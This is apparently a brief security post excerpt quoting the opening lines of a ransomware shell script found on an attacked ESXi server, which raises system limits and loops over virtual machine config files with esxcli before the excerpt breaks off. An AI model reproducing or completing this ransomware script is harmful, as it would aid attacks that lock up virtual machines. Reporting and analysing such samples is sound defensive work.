ESXi Ransomware Script
ESXi Ransomware A script was found on one of the servers that the attackers used to run the ransomware #!/bin/shCLEAN_DIR=”/tmp/” # SET LIMITS ulimit -p $(ulimit -Hp)ulimit -n $(ulimit -Hn) ## CHANGE CONFIG for config_file in $(esxcli vm process list | grep “Config File” | awk ‘{print $3}’); do echo “FIND CONFIG: $config_file” sed -i…
You must be logged in to post a comment.